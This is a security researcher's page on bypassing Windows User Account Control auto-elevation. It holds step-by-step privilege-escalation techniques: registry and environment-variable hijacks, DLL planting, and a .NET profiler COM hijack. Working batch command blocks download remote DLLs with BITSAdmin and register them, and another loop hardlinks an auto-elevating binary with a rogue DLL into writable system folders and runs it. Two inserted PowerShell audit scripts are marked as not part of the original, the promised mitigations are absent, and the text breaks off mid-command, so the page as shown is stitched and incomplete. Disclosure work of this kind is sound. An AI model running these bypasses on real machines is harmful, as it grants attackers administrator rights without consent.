URL: https://skanthak.homepage.t-online.de/uacamole.html
ME, MYSELF & IT

Last upload 06/03/2022 11:04:07

MITIGATE SOME EXPLOITS FOR WINDOWS’® UAC

  Purpose
  Background Information
  Reason
  Details
  Auto-elevating Applications
  Vulnerabilities
    Vulnerabilities of CompMgmtLauncher.exe
    Vulnerability of EventVwr.exe
    Vulnerability of MMC.exe (.NET Framework Profiler)
    Vulnerability of MMC.exe (HTML Help)
    Vulnerability of Shortcuts in the Start Menu
    Blended Vulnerabilities
    Blended Vulnerabilities (Continued)
    Blended Vulnerabilities (Finished)
    Compound Vulnerabilities
    MSRC Case 39303
    MSRC Case 64957
  Mitigations
    Mitigation against Exploitation of CompMgmtLauncher.exe
    Mitigation against Exploitation of EventVwr.exe
    Mitigations against Exploitation of .NET Framework Profiler
    Mitigations against Exploitation of HTML Help
    Mitigations against Exploitation of Vulnerable Shortcuts in the Start Menu
    Mitigation against Exploitation of WUSA.exe
    Mitigation against Exploitation of MSHTA.exe, CScript.exe and WScript.exe
    Mitigations against Exploitation of Compound Vulnerabilities
    Alternative Mitigation
  Installation
  Update
  Deinstallation
  Trivia

PURPOSE

Mitigate some exploits for vulnerabilities introduced with Windows 7 by the auto-elevation (mis)feature of the braindead security theatre known as User Account Control.

Note: qUACkery is another adequate name for this abomination!

REASON

As shipped by Microsoft®, all versions of Windows® are unsafe: Windows is still set up without strict privilege separation, i.e. without separate accounts for (unprivileged) user(s) and (privileged) administrator(s)!

The TechNet article What's New in User Account Control states for example:

> Because UAC requires an administrator to approve application installations,
> unauthorized applications cannot be installed automatically or without the
> explicit consent of an administrator.

This statement is wrong, though: due to the changes introduced with Windows 7, unauthorised applications can be executed (and installed) automatically, without the explicit consent of an administrator!
Also see Mark Russinovich’s TechNet Magazine articles Inside Windows Vista User Account Control and Inside Windows 7 User Account Control.

BACKGROUND INFORMATION

> User Account Protection was the preliminary name for a core security component
> of Windows Vista. The component has now been officially named User Account
> Control (UAC).

Windows Vista® introduced the security feature (really: security theatre) User Account Control: programs which need or want to be run with administrative privileges and access rights have to ask the user for consent.

This made some (really: a minority of) users quite angry: although these (rather braindead) users continued to abuse the (privileged) protected administrator account created during Windows Setup for their daily work (instead of following best practice and using an unprivileged limited alias standard user account), they had to answer a prompt whenever they wanted to perform an administrative task.

Unfortunately Microsoft heard these users and weakened the security feature: Windows 7 introduced auto-elevation and enabled it for some 55 programs shipped with Windows 7 and later versions, which don’t prompt for consent any more.

Due to flaws in the design and deficiencies in the implementation of User Account Control, it can be bypassed trivially in numerous ways with its auto-elevation (mis)feature enabled. As a result, arbitrary programs can then be run with administrative privileges and access rights without prompting the user for consent.

To defeat some of these trivial bypasses, auto-elevation must be disabled by moving the slider of the User Account Control setting to its highest position titled Always notify, as documented and shown in the MSKB articles 975787 and 4462938.
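Both facts of the previous paragraphs can be checked on a given installation: whether the slider actually sits at Always notify, and which programs carry the auto-elevation property. The following PowerShell script is an added example and not part of the original page. It reads the policy values the slider writes below HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (the Always notify position corresponds to ConsentPromptBehaviorAdmin = 2 with PromptOnSecureDesktop = 1; the default position writes 5 and 1) and lists the executables of one system directory whose embedded manifest contains <autoElevate>true</autoElevate> and which carry a valid Microsoft signature. The manifest test is a byte-pattern heuristic over the file contents rather than a resource parser, the signer test matches the certificate subject by name, and both are assumptions of this example; it needs Windows PowerShell 3.0 or later.

```powershell
# Added example, not part of the original page: audit the UAC prompt policy and
# list the auto-elevating executables of one system directory.

$UacPolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacPromptState {
    # Values written by the UAC slider: ConsentPromptBehaviorAdmin 2 = "Always notify"
    # (consent on the secure desktop), 5 = default "Notify me only when programs try
    # to make changes" (Windows binaries auto-elevate), 0 = elevate silently.
    $p = Get-ItemProperty -LiteralPath $UacPolicyKey
    $state = [pscustomobject]@{
        EnableLUA                  = [int]$p.EnableLUA
        ConsentPromptBehaviorAdmin = [int]$p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = [int]$p.PromptOnSecureDesktop
        AutoElevationDisabled      = $false
    }
    $state.AutoElevationDisabled = ($state.EnableLUA -eq 1 -and
                                    $state.ConsentPromptBehaviorAdmin -eq 2 -and
                                    $state.PromptOnSecureDesktop -eq 1)
    $state
}

function Set-UacAlwaysNotify {
    # Moves the slider to "Always notify"; requires an elevated (administrator) shell.
    Set-ItemProperty -LiteralPath $UacPolicyKey -Name EnableLUA                  -Value 1 -Type DWord
    Set-ItemProperty -LiteralPath $UacPolicyKey -Name ConsentPromptBehaviorAdmin -Value 2 -Type DWord
    Set-ItemProperty -LiteralPath $UacPolicyKey -Name PromptOnSecureDesktop      -Value 1 -Type DWord
}

function Get-AutoElevatingExecutable {
    param([string]$Directory = (Join-Path $env:SystemRoot 'System32'))
    # Heuristic (assumption of this example): the embedded RT_MANIFEST resource is
    # plain XML, so <autoElevate>true</autoElevate> is visible in the raw file bytes.
    $pattern = [regex]'<autoElevate>\s*true\s*</autoElevate>'
    Get-ChildItem -LiteralPath $Directory -Filter *.exe -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            try { $bytes = [System.IO.File]::ReadAllBytes($_.FullName) } catch { return }
            if (-not $pattern.IsMatch([System.Text.Encoding]::ASCII.GetString($bytes))) { return }
            # Second condition: a valid Microsoft signature. The trusted location is
            # implied by scanning the system directory itself.
            $sig = Get-AuthenticodeSignature -LiteralPath $_.FullName
            [pscustomobject]@{
                Name              = $_.Name
                SignatureStatus   = $sig.Status
                SignedByMicrosoft = ($sig.Status -eq 'Valid' -and
                                     $sig.SignerCertificate.Subject -like '*O=Microsoft Corporation*')
            }
        }
}

# Usage: the audit needs no elevation; Set-UacAlwaysNotify does.
Get-UacPromptState | Format-List
Get-AutoElevatingExecutable | Sort-Object Name | Format-Table -AutoSize
# Get-AutoElevatingExecutable -Directory (Join-Path $env:SystemRoot 'SysWOW64')   # 32-bit builds
# Set-UacAlwaysNotify
```

On 64-bit Windows run the script from a 64-bit PowerShell, so that %SystemRoot%\System32\ is the 64-bit directory; the commented-out call with SysWOW64 yields the 32-bit builds. A binary that matches the pattern but is not signed by Micros­oft, or lies outside the trusted locations, does not auto-elevate.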
DETAILS

UAC auto-elevation is enabled for applications which

* have the autoElevate property set in their (embedded) Application Manifest,
* are digitally signed by Microsoft with the Windows Publisher code signing certificate, and
* are stored in secure alias trusted locations like %SystemRoot%\ and its subdirectories.

As documented and shown in the MSKB articles 975787 and 4462938, auto-elevation is performed for enabled applications unless the slider is set to its highest position titled Always notify; its default setting is, however, Notify me only when programs try to make changes to my computer.

AUTO-ELEVATING APPLICATIONS

Legend: • • = shipped as 64-bit and as 32-bit build, • = shipped for one of the two architectures only.

WINDOWS 7 SP1, X64 ALIAS AMD64 PROCESSOR ARCHITECTURE

    Application                                    Builds
    AdapterTroubleshooter.exe                      • •
    BitLockerWizardElev.exe                        •
    bthudtask.exe                                  • •
    chkntfs.exe                                    • •
    cleanmgr.exe                                   • •
    cliconfg.exe                                   • •
    CompMgmtLauncher.exe                           •
    ComputerDefaults.exe                           • •
    dccw.exe                                       • •
    dcomcnfg.exe                                   • •
    DeviceEject.exe                                •
    DeviceProperties.exe                           • •
    dfrgui.exe                                     • •
    djoin.exe                                      •
    eudcedit.exe                                   • •
    eventvwr.exe                                   • •
    fsquirt.exe                                    •
    FXSUNATD.exe                                   •
    hdwwiz.exe                                     • •
    ieUnatt.exe                                    • •
    iscsicli.exe                                   • •
    iscsicpl.exe                                   • •
    lpksetup.exe                                   •
    Mcx2Prov.exe                                   •
    MdSched.exe                                    •
    msconfig.exe                                   •
    msdt.exe                                       • •
    msra.exe                                       •
    MultiDigiMon.exe                               •
    Netplwiz.exe                                   • •
    newdev.exe                                     • •
    ntprint.exe                                    • •
    ocsetup.exe                                    • •
    odbcad32.exe                                   • •
    OptionalFeatures.exe                           • •
    PDMSetup.exe                                   • •
    perfmon.exe                                    • •
    printui.exe                                    • •
    rdpshell.exe                                   •
    recdisc.exe                                    •
    rrinstaller.exe                                • •
    rstrui.exe                                     •
    sdbinst.exe                                    • •
    sdclt.exe                                      •
    setupsqm.exe                                   •
    shrpubw.exe                                    • •
    slui.exe                                       •
    SndVol.exe                                     • •
    sysprep.exe                                    •
    SystemPropertiesAdvanced.exe                   • •
    SystemPropertiesComputerName.exe               • •
    SystemPropertiesDataExecutionPrevention.exe    • •
    SystemPropertiesHardware.exe                   • •
    SystemPropertiesPerformance.exe                • •
    SystemPropertiesProtection.exe                 • •
    SystemPropertiesRemote.exe                     • •
    taskmgr.exe                                    • •
    tcmsetup.exe                                   • •
    TpmInit.exe                                    • •
    verifier.exe                                   • •
    WindowsAnytimeUpgrade.exe                      •
    wisptis.exe                                    •
    wusa.exe                                       • •

WINDOWS 10 2004 AND WINDOWS 10 20H2, X64 ALIAS AMD64 PROCESSOR ARCHITECTURE

    Application                                    Builds
    BitLockerWizardElev.exe                        •
    bthudtask.exe                                  • •
    changepk.exe                                   •
    cleanmgr.exe                                   • •
    ComputerDefaults.exe                           • •
    dccw.exe                                       • •
    dcomcnfg.exe                                   • •
    DeviceEject.exe                                •
    DeviceProperties.exe                           •
    dfrgui.exe                                     • •
    djoin.exe                                      •
    easinvoker.exe                                 •
    EASPolicyManagerBrokerHost.exe                 •
    eudcedit.exe                                   • •
    eventvwr.exe                                   • •
    fodhelper.exe                                  •
    fsavailux.exe                                  •
    fsquirt.exe                                    • •
    FXSUNATD.exe                                   •
    immersivetpmvscmgrsvr.exe                      •
    iscsicli.exe                                   • •
    iscsicpl.exe                                   • •
    lpksetup.exe                                   •
    MdSched.exe                                    •
    MSchedExe.exe                                  •
    msconfig.exe                                   •
    msdt.exe                                       • •
    msra.exe                                       •
    MultiDigiMon.exe                               •
    Netplwiz.exe                                   • •
    newdev.exe                                     • •
    odbcad32.exe                                   • •
    OptionalFeatures.exe                           •
    PasswordOnWakeSettingFlyout.exe                • •
    perfmon.exe                                    • •
    printui.exe                                    • •
    rdpshell.exe                                   •
    recdisc.exe                                    •
    rrinstaller.exe                                • •
    rstrui.exe                                     •
    sdclt.exe                                      •
    shrpubw.exe                                    • •
    slui.exe                                       •
    SndVol.exe                                     • •
    SystemPropertiesAdvanced.exe                   • •
    SystemPropertiesComputerName.exe               • •
    SystemPropertiesDataExecutionPrevention.exe    • •
    SystemPropertiesHardware.exe                   • •
    SystemPropertiesPerformance.exe                • •
    SystemPropertiesProtection.exe                 • •
    SystemPropertiesRemote.exe                     • •
    systemreset.exe                                •
    SystemSettingsAdminFlows.exe                   •
    SystemSettingsRemoveDevice.exe                 •
    Taskmgr.exe                                    • •
    tcmsetup.exe                                   • •
    TpmInit.exe                                    • •
    WindowsUpdateElevatedInstaller.exe             •
    WSReset.exe                                    •
    wusa.exe                                       • •

VULNERABILITIES

The following vulnerabilities can be exploited in standard installations of Windows 7 and newer versions of Windows NT, without user interaction!

Note: only vulnerabilities and exploits for which a mitigation exists are presented here, together with their mitigation!

VULNERABILITIES OF COMPMGMTLAUNCHER.EXE

The superfluous application Computer Management Snapin Launcher CompMgmtLauncher.exe is used to start the Computer Management snap-in CompMgmt.msc of the Microsoft Management Console; it is one of the about 63 applications shipped with Windows 7 and newer versions of Windows NT which have auto-elevation enabled.
Note: it is superfluous because the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\CompMgmt.msc" launches Computer Management directly, and MMC.exe has auto-elevation enabled too.

CompMgmtLauncher.exe has a major design flaw: instead of launching the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\CompMgmt.msc" it launches the shortcut %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk alias %ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk.

An unprivileged user can set the environment variable ALLUSERSPROFILE to the pathname of an arbitrary directory under his control, create the subdirectory Microsoft\Windows\Start Menu\Programs\Administrative Tools\ there and then create the shortcut Computer Management.lnk specifying an arbitrary (rogue) command line in this subdirectory. In standard installations of Windows 7 and newer versions of Windows NT, CompMgmtLauncher.exe launches this command line without UAC prompt with administrative privileges and access rights.

Note: because the command line %SystemRoot%\System32\CompMgmt.msc of the shortcut %ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk specifies no executable file, CompMgmtLauncher.exe exhibits the (following) vulnerability of EventVwr.exe too.

VULNERABILITY OF EVENTVWR.EXE

The superfluous application Event Viewer Snapin Launcher EventVwr.exe is used to start the Event Viewer snap-in EventVwr.msc of MMC.exe; it is one of the about 63 applications shipped with Windows 7 and newer versions of Windows NT which have auto-elevation enabled.

Note: it is superfluous because the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\EventVwr.msc" launches Event Viewer directly, and MMC.exe has auto-elevation enabled too.
Note: EventVwr.exe exists for backward compatibility with Windows NT4 and earlier versions of Windows NT only; in Windows 2000 the standalone Event Viewer application was replaced by the snap-in EventVwr.msc.

EventVwr.exe has a major design flaw: instead of launching the command line "%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\EventVwr.msc" it calls the Win32 function ShellExecute() to launch EventVwr.msc; to evaluate the command line to execute, ShellExecute() reads the (unnamed) default values of the Registry keys HKEY_CLASSES_ROOT\.msc and HKEY_CLASSES_ROOT\mscfile\Shell\Open\Command.

The (virtual) Registry branch HKEY_CLASSES_ROOT is the overlay of the Registry branch HKEY_LOCAL_MACHINE\SOFTWARE\Classes with the Registry branch HKEY_CURRENT_USER\Software\Classes, i.e. the latter takes precedence.

An unprivileged user can create the Registry key HKEY_CURRENT_USER\Software\Classes\mscfile\Shell\Open\Command and write an arbitrary (rogue) command line to its (unnamed) default value, or create the Registry key HKEY_CURRENT_USER\Software\Classes\.msc and write an arbitrary (rogue) Programmatic Identifier (uacamole for example) to its (unnamed) default value, then create the Registry key HKEY_CURRENT_USER\Software\Classes\uacamole\Shell\Open\Command and write an arbitrary (rogue) command line to its (unnamed) default value. In standard installations of Windows 7 and newer versions of Windows NT, EventVwr.exe launches this command line without UAC prompt with administrative privileges and access rights.

VULNERABILITY OF MMC.EXE (.NET FRAMEWORK PROFILER)

Multiple snap-ins of the Microsoft Management Console are implemented using the .NET Framework.
As documented in the MSDN article Registry-Free Profiler Startup and Attach, when the .NET Framework is loaded, its Common Language Runtime execution engine evaluates the environment variables COR_ENABLE_PROFILING and COR_PROFILER, since .NET Framework 4 additionally COR_PROFILER_PATH, and loads the COM object specified by them as Code Profiler:

> When both environment variable checks pass, the CLR creates an instance of the
> profiler in a similar manner to the COM CoCreateInstance function. The
> profiler is not loaded through a direct call to CoCreateInstance. Therefore, a
> call to CoInitialize, which requires setting the threading model, is avoided.

The CLR execution engine fails, however, to implement the security checks added to the Win32 function CoCreateInstance() in Windows Vista®:

> The Component Object Model (COM) leverages the registry to maintain
> information about all of the COM objects installed on a computer. This
> registry hive (HKEY_CLASSES_ROOT) is a virtual registry hive, which allows for
> both per-user and per-machine object registration. Per-user COM objects
> configurations are stored in HKEY_CURRENT_USER\Software\Classes, while
> per-machine configurations are stored in HKEY_LOCAL_MACHINE\Software\Classes.
> Typically, per-user configurations take precedence.
>
> Beginning with Windows Vista® and Windows Server® 2008, if the integrity level
> of a process is higher than Medium, the COM runtime ignores per-user COM
> configuration and accesses only per-machine COM configuration. This action
> reduces the surface area for elevation of privilege attacks, preventing a
> process with standard user privileges from configuring a COM object with
> arbitrary code and having this code called from an elevated process.

An unprivileged user can set the environment variables and create the Registry keys and entries below HKEY_CURRENT_USER\Software\Classes\CLSID to register an arbitrary (rogue) DLL as COM object.
In standard installations of Windows 7 and newer versions of Windows NT, MMC.exe loads this DLL without UAC prompt with administrative privileges and access rights.

Note: this vulnerability allows arbitrary code execution in every application which uses the .NET Framework!

Start the Command Processor under the user protected administrator account created during Windows Setup and run the following (block of) command lines:

    REM Copyright © 2017-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
    REM Fetch the demonstration DLLs (one per processor architecture) into %TMP%
    "%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER Exploit /DOWNLOAD /PRIORITY FOREGROUND https://skanthak.homepage.t-online.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
    "%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:*.DLL "%TMP%"
    REM Tell the CLR to load the COM object with this CLSID as code profiler
    SET COR_ENABLE_PROFILING=1
    SET COR_PROFILER={32E2F4DA-1BEA-47EA-88F9-C5DAF691C94A}
    REM SET COR_PROFILER_PATH=%TMP%\%PROCESSOR_ARCHITECTURE%\SENTINEL.DLL
    REM Register the DLL per user, in the native and (on 64-bit Windows) the 32-bit view
    IF NOT "%PROCESSOR_ARCHITECTURE%" == "x86" (
        "%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /VE /T REG_SZ /D "%TMP%\%PROCESSOR_ARCHITECTURE%\SENTINEL.DLL" /F
        "%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F
        "%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /REG:32 /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
        "%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /REG:32 /V ThreadingModel /T REG_SZ /D Apartment /F
    ) ELSE (
        "%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
        "%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\%COR_PROFILER%\InProcServer32" /V ThreadingModel /T REG_SZ /D Apartment /F
    )
    REM Start the .NET based snap-in; MMC.exe auto-elevates and the CLR loads the DLL
    START EventVwr.msc

VULNERABILITY OF MMC.EXE (HTML HELP)

The help function of the Microsoft Management Console is implemented with HTML Help: when the F1 key is pressed, MMC.exe calls HHCtrl.ocx, which in turn loads an arbitrary (rogue) DLL registered by the unprivileged user with the following Registry entry:

    REGEDIT4

    [HKEY_CURRENT_USER\Software\Microsoft\HtmlHelp Author]
    "Location"="‹path›\\‹filename›.‹extension›"

In standard installations of Windows Vista and newer versions of Windows NT, ‹path›\‹filename›.‹extension› is executed with administrative privileges and access rights.

Note: this undocumented feature allows arbitrary code execution in every application which uses HTML Help!

VULNERABILITY OF SHORTCUTS IN THE START MENU

The shortcuts for all snap-ins of the Microsoft Management Console in the directories %ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\ and %ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ show the same vulnerability as EventVwr.exe: Windows Explorer processes their command lines %SystemRoot%\System32\‹filename›.msc just like the Win32 function ShellExecute() does.

BLENDED VULNERABILITIES

WUSA.exe, the Windows Update Standalone Installer, is yet another of the about 63 applications shipped with Windows 7 and newer versions of Windows NT which have auto-elevation enabled. Its /Extract:‹destination› command-line switch allows extracting the contents of arbitrary cabinet archives into arbitrary destination directories.
Because it runs elevated, this feature can be (ab)used to plant DLLs loaded and executed by other applications which have auto-elevation enabled, to gain administrative privileges and access rights:

MMC.exe
    The Event Viewer snap-in EventVwr.msc of the Microsoft Management Console MMC.exe loads and executes ELS.dll, which in turn loads and executes ELSExt.dll; because ELSExt.dll is not shipped with Windows, an arbitrary (rogue) DLL with this filename can be planted in the system directory %SystemRoot%\System32\, from where it is then loaded and executed with administrative privileges and access rights.

CliConfg.exe
    The SQL Client Configuration Utility CliConfg.exe has auto-elevation enabled too. It loads and executes NTWDBLib.dll; because NTWDBLib.dll is not shipped with Windows, an arbitrary (rogue) DLL with this filename can be planted in the system directory %SystemRoot%\System32\, from where it is then loaded and executed with administrative privileges and access rights.

SysPrep.exe
    The System Preparation Utility SysPrep.exe has auto-elevation enabled too. In Windows 7 and Windows Server 2008 R2, it loads and executes CryptBase.dll, CryptSP.dll, DWMAPI.dll, RPCRtRemote.dll and UXTheme.dll; because these DLLs don’t exist in its application directory %SystemRoot%\System32\SysPrep\, arbitrary (rogue) DLLs with these filenames can be planted there, from where they are then loaded and executed with administrative privileges and access rights.

SetupSQM.exe
    The Setup SQM Tool SetupSQM.exe has auto-elevation enabled too. It loads and executes WDSCore.dll; because WDSCore.dll does not exist in its application directory %SystemRoot%\System32\OoBE\, an arbitrary (rogue) DLL with this filename can be planted there, from where it is then loaded and executed with administrative privileges and access rights.

MCX2Prov.exe
    The MCX2 Provisioning Library MCX2Prov.exe has auto-elevation enabled too. In Windows 7 it loads and executes CryptBase.dll; because CryptBase.dll does not exist in its application directory %SystemRoot%\eHome\, an arbitrary (rogue) DLL with this filename can be planted there, from where it is then loaded and executed with administrative privileges and access rights.

PkgMgr.exe
    The Windows Package Manager PkgMgr.exe has auto-elevation enabled too. It calls DISMHost.exe to perform some of its tasks, which loads and executes PEProvider.dll; because PEProvider.dll is not shipped with Windows, an arbitrary (rogue) DLL with this filename can be planted in its application directory %SystemRoot%\System32\DISM\, from where it is then loaded and executed with administrative privileges and access rights.

MSHTA.exe, CScript.exe and WScript.exe
    In Windows 7 and Windows Server 2008 R2, the applications Microsoft HTML Application Host MSHTA.exe, Console Based Script Host CScript.exe and Windows Based Script Host WScript.exe are shipped without embedded Application Manifest. Windows’ module loader therefore evaluates external (rogue) application manifests MSHTA.exe.manifest, CScript.exe.manifest and WScript.exe.manifest planted in the system directory %SystemRoot%\System32\. These application manifests can enable auto-elevation, resulting in execution of every HTML Application *.hta, every JScript *.js or *.jse, every VBScript *.vbs or *.vbe, as well as every other script *.wsf or *.wsh for the Windows Script Host with administrative privileges and access rights.

Note: Windows 10 removed the /Extract switch from WUSA.exe, so planting files this way is limited to Windows 7, Windows 8 and Windows 8.1 (and their server counterparts); the applications listed above remain vulnerable wherever an attacker finds another way to write the respective directory.

BLENDED VULNERABILITIES (CONTINUED)

The Diagnostics Troubleshooting Wizard MSDT.exe performs auto-elevation. Its satellites, including various DLLs, are installed in multiple subdirectories %SystemRoot%\Diagnostics\Index\*\ and %SystemRoot%\Diagnostics\System\*\. Running elevated, MSDT.exe launches the Scripted Diagnostics Native Host SDiagNHost.exe which loads and executes these DLLs.
On 64-bit installations of Windows, most of them are built for the 64-bit execution environment, and some of them are built for the 32-bit execution environment, i.e. the DLLs for one of the execution environments are missing! When searching the PATH for a DLL, Windows’ module loader skips DLLs built for execution environments other than that of the running process.

An unprivileged user can build the missing DLLs and place them in an arbitrary directory of the search path, for example the directory %LOCALAPPDATA%\Microsoft\WindowsApps\ alias %USERPROFILE%\AppData\Local\Microsoft\WindowsApps\ introduced with Windows 8.

Note: the (tail of the) search path is controlled by the unprivileged user, who can add arbitrary directories to the user environment variable PATH!

In standard installations of Windows 7 and newer versions of Windows NT, MSDT.exe loads and executes these DLLs indirectly via SDiagNHost.exe, without UAC prompt, with administrative privileges and access rights.

Note: this bypass was also found independently and published as MSDT DLL Hijack UAC bypass.

BLENDED VULNERABILITIES (FINISHED)

In Windows 8 and newer versions of Windows NT, the Microsoft® Windows Backup command line tool SDCLT.exe, which has auto-elevation enabled, launches, running elevated, the Windows Control Panel Control.exe, which calls ShellExecute() to open a folder. ShellExecute() reads the (unnamed) default value of the Registry key HKEY_CLASSES_ROOT\Folder\Shell\Open\Command and executes the command line found there.

The (virtual) Registry branch HKEY_CLASSES_ROOT is the overlay of the Registry branches HKEY_LOCAL_MACHINE\SOFTWARE\Classes and HKEY_CURRENT_USER\Software\Classes, i.e. the latter takes precedence.

An unprivileged user can create the Registry key HKEY_CURRENT_USER\Software\Classes\Folder\Shell\Open\Command and write an arbitrary (rogue) command line to its (unnamed) default value.
In standard installations of Windows 8 and newer versions of Windows NT, SDCLT.exe launches this command line indirectly via Control.exe, without UAC prompt, with administrative privileges and access rights.

Note: this bypass was also found independently and published as Yet another sdclt UAC bypass.

COMPOUND VULNERABILITIES

For more than 23 (in words: twenty-three) years, Microsoft’s developers as well as their quality miserability assurance have ignored their own company’s security guidance, given for example in the MSDN articles Dynamic-Link Library Security and Dynamic-Link Library Search Order, the Security Advisory 2269637, the MSKB articles 2389418 and 2533623, the MSRC post Load Library Safely, plus many more documents.

Due to this gross incompetence and negligence, almost all applications shipped with Windows are vulnerable to the well-known and well-documented CWE-426: Untrusted Search Path as well as CWE-427: Uncontrolled Search Path Element, and susceptible to the well-known and well-documented CAPEC-471: Search Order Hijacking.

Several directories below %SystemRoot%\, for example %SystemRoot%\System32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ and %SystemRoot%\System32\Microsoft\Crypto\RSA\MachineKeys\, are writable by unprivileged users, who can copy one of the about 63 (vulnerable) applications which have the auto-elevation (mis)feature enabled, next to any (rogue) DLLs they load, into these directories and execute them there to exploit this vulnerability and run arbitrary code provided in the DLLs with administrative privileges and access rights!
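Which directories below the trusted locations are writable by unprivileged users differs per installation and per installed product, so it is worth enumerating them. The following PowerShell script is an added example and not part of the original page: it walks the directories below %SystemRoot%\ (and, like the batch scripts of this section, %ProgramData%\ and the Program Files directories) and reports every allow ACE that grants a principal every interactive standard user belongs to the right to create files or subdirectories. The principal names are assumed to be the English ones reported by Get-Acl, deny ACEs for the same principal are not subtracted, and inherit-only ACEs are skipped because they grant nothing on the directory itself; all three are simplifications of this example.

```powershell
# Added example, not part of the original page: list directories below the trusted
# system locations in which low-privileged principals may create files, i.e. the
# places where an auto-elevating application and a rogue DLL could be planted.

function Get-UserWritableDirectory {
    param(
        [string[]]$Root = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)}, $env:ProgramData)
    )
    # Principals every interactive standard user belongs to (assumption: English
    # names as reported by Get-Acl; localized installations differ).
    $lowPrivileged = @('Everyone',
                       'NT AUTHORITY\Authenticated Users',
                       'NT AUTHORITY\INTERACTIVE',
                       'BUILTIN\Users')
    # Rights that allow planting a file in a directory. Inherited ACEs may carry
    # generic rights, which Get-Acl reports numerically, hence the raw bit masks:
    # 0x2 WriteData/CreateFiles, 0x4 AppendData/CreateDirectories,
    # 0x40000000 GENERIC_WRITE, 0x10000000 GENERIC_ALL.
    $writeMask   = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000
    $inheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly

    foreach ($r in ($Root | Where-Object { $_ -and (Test-Path -LiteralPath $_) })) {
        $dirs = @(Get-Item -LiteralPath $r) +
                @(Get-ChildItem -LiteralPath $r -Directory -Recurse -Force -ErrorAction SilentlyContinue)
        foreach ($dir in $dirs) {
            try { $acl = Get-Acl -LiteralPath $dir.FullName -ErrorAction Stop } catch { continue }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
                if ($lowPrivileged -notcontains $ace.IdentityReference.Value) { continue }
                # An inherit-only ACE grants nothing on this directory itself.
                if (($ace.PropagationFlags -band $inheritOnly) -ne 0) { continue }
                if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
                [pscustomobject]@{
                    Directory = $dir.FullName
                    Identity  = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                    Inherited = $ace.IsInherited
                }
            }
        }
    }
}

# Usage: runs as a standard user (directories whose DACL cannot be read are skipped);
# a full walk of %SystemRoot%\ including WinSxS takes a few minutes.
Get-UserWritableDirectory | Sort-Object Directory, Identity | Format-Table -AutoSize
```

Every directory reported is a candidate for the copy-and-hardlink test of the batch scripts in this section; whether an auto-elevating application copied there is elevated without prompt still depends on the directory being one AppInfo treats as trusted, which is exactly what those scripts record in their log file.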
Start the Command Processor with delayed variable expansion enabled under the user protected administrator account created during Windows Setup and run the following (blocks of) command lines:

    REM Copyright © 2011-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
    TITLE Step 1: NetPlWiz.exe shows a (yellow) UAC prompt when started in an untrusted directory
    COPY /Y "%SystemRoot%\System32\NetPlWiz.exe" "%ProgramData%\NetPlWiz.exe"
    START "Oops!" /WAIT "%ProgramData%\NetPlWiz.exe"
    "%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%
    TITLE Step 2: NetPlWiz.exe loads an arbitrary NetPlWiz.dll from an untrusted directory
    REM ShUnimpl.dll stands in for a rogue DLL: it is loaded, but lacks the imported entry points
    COPY /Y "%SystemRoot%\System32\ShUnimpl.dll" "%ProgramData%\NetPlWiz.dll"
    START "Ouch!" /WAIT "%ProgramData%\NetPlWiz.exe"
    "%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%
    TITLE Step 3: NetPlWiz.exe auto-elevates and loads an arbitrary NetPlWiz.dll
    COPY /Y NUL: "%ProgramData%\NetPlWiz.log"
    DIR "%SystemRoot%" /A:D /B /S 1>"%ProgramData%\NetPlWiz.tmp"
    REM For every directory below %SystemRoot%: the first MKLINK probes for write access,
    REM then both files are hardlinked there, run, and their exit code is logged
    FOR /F "Delims= UseBackQ" %? IN ("%ProgramData%\NetPlWiz.tmp") DO @(
        MKLINK /H "%~?\NetPlWiz.dll" "%ProgramData%\NetPlWiz.dll" 2>NUL: && (
            MKLINK /H "%~?\NetPlWiz.exe" "%ProgramData%\NetPlWiz.exe"
            START "BOOM?" /WAIT "%~?\NetPlWiz.exe"
            ECHO !ERRORLEVEL! %~? 1>>"%ProgramData%\NetPlWiz.log"
